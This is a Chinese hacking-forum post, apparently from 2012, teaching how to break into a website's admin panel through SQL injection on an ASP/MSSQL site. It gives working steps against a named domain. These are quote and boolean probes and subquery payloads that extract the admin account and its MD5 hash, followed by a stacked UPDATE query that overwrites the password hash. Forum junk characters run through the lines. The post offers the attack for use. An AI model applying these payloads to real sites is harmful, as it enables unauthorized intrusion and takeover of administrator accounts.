经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。1 ]5 |# V, m6 M3 S7 z
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
4 ~. H1 M! `7 a7 j3 b测试如下:* }& ~- K5 h4 q2 F+ G9 `1 v. ?2 U/ e
http://www.tmdsb.com/news.asp?id=121
) @5 o, |/ Q, f# G+ O. N在地址后输入单引号,显示( E$ w! {) Y% ]& \+ j% \) L. _
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’
8 @. R4 V) p- V! Y( O9 S字符串 ’’’ 之前有未闭合的引号' x7 Z$ u% s2 _5 B" r
/news/tmdws.asp,行63
& Q0 @* j4 g8 ^. b' B+ {7 ^/ }说明没有过滤单引号且数据库是MSSQL./ U% d" f r6 c: a' f8 {
and 1=1正常。and 1=2出错。肯定存在注入5 t1 c [" ~- {2 Q( H r4 T
接着输入
/ ?2 S' M C7 L" G F4 lhttp://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
: e# u5 _: h' h) `/ I得到帐号为:admin
, M: m+ X5 G2 i4 Bhttp://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)7 ~& Y+ i8 y' G+ T7 D
得到密码为:a4716077c2ba075c3 X7 C% S1 ^" f. N
接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f294332 d% h$ v! {( h% P! R6 x
命令如下 :
; D& L2 }; c. f7 z+ v! i( C;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
" M; [! O- m/ f7 f# Y这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41